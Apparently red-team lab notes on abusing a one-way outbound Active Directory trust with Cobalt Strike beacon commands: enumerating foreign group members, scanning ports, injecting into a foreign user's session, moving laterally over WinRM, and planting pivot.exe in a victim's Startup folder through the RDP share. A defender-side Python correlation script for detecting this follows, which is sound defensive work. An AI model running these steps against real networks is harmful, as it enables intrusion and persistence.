One Way (Outbound)
Find foreign users in our current domain that belong to the outbound-trusted domain
beacon> powershell Get-DomainForeignGroupMember -Domain cyberbotic.io
GroupDomain : cyberbotic.io
GroupName : Jump Users
GroupDistinguishedName : CN=Jump Users,CN=Users,DC=cyberbotic,DC=io
MemberDomain : cyberbotic.io
MemberName : S-1-5-21-3022719512-2989052766-178205875-1115
MemberDistinguishedName : CN=S-1-5-21-3022719512-2989052766-178205875-1115,CN=ForeignSecurityPrincipals,DC=cyberbotic,DC=io
Enumerate the privileges of this group (the foreign SID can't be resolved to a name from this domain)
beacon> powershell Get-DomainGPOUserLocalGroupMapping -Identity "Jump Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
sql-1.cyberbotic.io
exch-1.cyberbotic.io
beacon> powershell Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName
sql-1.cyberbotic.io
exch-1.cyberbotic.io
Compromise these machines and wait until the targeted user logs in
beacon> net logons
Logged on users at \\localhost:
ZPS\jean.wise
CYBER\SQL-1$
Does jean.wise have any privileged access in zeropointsecurity.local?
Can we reach any useful ports/services (445, 3389, 5985 etc.) in zeropointsecurity.local?
beacon> portscan 10.10.18.0/24 139,445,3389,5985 none 1024
# Inject into the external user's session
beacon> inject 4960 x64 tcp-local
[+] established link to child beacon: 10.10.15.90
Now we can enumerate the external domain and access the external machines
beacon> remote-exec winrm sql01.zeropointsecurity.local whoami; hostname
zps\jean.wise
sql01
beacon> jump winrm64 sql01.zeropointsecurity.local pivot-sql-1
[+] established link to child beacon: 10.10.18.221
Or via the drive shares exposed over the RDP session (\\tsclient)
beacon> ls \\tsclient\c
beacon> cd \\tsclient\c\Users\jean.wise\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe
beacon> ls
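As an added defender-side example (not part of these notes): the path above leaves two observable artefacts on the pivot host, an RDP logon by an account from the trusted domain (Security event 4624 with LogonType 10 and a TargetDomainName outside our own domains) and a file dropped into a user's Startup folder (Sysmon Event ID 11, FileCreate). The script below correlates the two on the same host over constructed sample events; the field names, the set of our own domains and the sample events are assumptions made for this example.

```python
"""Defender-side correlation for the technique in these notes: an RDP logon by an
account from a trusted (foreign) domain, followed on the same host by an executable
dropped into a user's Startup folder. Field names, the set of our own domains and
the sample events are assumptions constructed for this example."""
import re
from collections import defaultdict

LOCAL_DOMAINS = {"CYBER"}  # NetBIOS names of our own forest's domains (assumed)
STARTUP = r"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
# Anything landing in a per-user Startup folder runs at that user's next logon.
STARTUP_RE = re.compile(r"\\Users\\[^\\]+" + re.escape(STARTUP)
                        + r"\\[^\\]+\.(exe|dll|lnk|bat|cmd|ps1|vbs)$", re.IGNORECASE)

# Constructed events: Security 4624 (logon) and Sysmon Event ID 11 (FileCreate).
EVENTS = [
    {"ts": 100, "host": "SQL-1", "id": 4624, "type": 10, "domain": "ZPS", "user": "jean.wise"},
    {"ts": 200, "host": "SQL-1", "id": 4624, "type": 10, "domain": "CYBER", "user": "bob"},
    {"ts": 900, "host": "SQL-1", "id": 11, "target": r"C:\Users\jean.wise" + STARTUP + r"\pivot.exe"},
    {"ts": 950, "host": "EXCH-1", "id": 11, "target": r"C:\Users\alice" + STARTUP + r"\pivot.exe"},
    {"ts": 1000, "host": "SQL-1", "id": 11, "target": r"C:\Users\jean.wise\Documents\notes.txt"},
]

def is_foreign_rdp_logon(ev):
    """4624 with LogonType 10 (RemoteInteractive) from a domain outside our forest."""
    return (ev["id"] == 4624 and ev["type"] == 10
            and ev["domain"].upper() not in LOCAL_DOMAINS)

def is_startup_drop(ev):
    """Sysmon FileCreate whose path is inside a user's Startup folder."""
    return ev["id"] == 11 and STARTUP_RE.search(ev.get("target", "")) is not None

def correlate(events, window=3600):
    """Return (host, foreign account, dropped file) for every Startup write that
    follows a foreign RDP logon on the same host within `window` seconds."""
    logons = defaultdict(list)  # host -> foreign RDP logons seen so far
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if is_foreign_rdp_logon(ev):
            logons[ev["host"]].append(ev)
        elif is_startup_drop(ev):
            for lg in logons[ev["host"]]:
                if 0 <= ev["ts"] - lg["ts"] <= window:
                    hits.append((ev["host"], f"{lg['domain']}\\{lg['user']}", ev["target"]))
                    break
    return hits
```

The local-domain RDP logon on SQL-1 and the Startup write on EXCH-1 (no preceding foreign logon) produce no alert; only the SQL-1 sequence does.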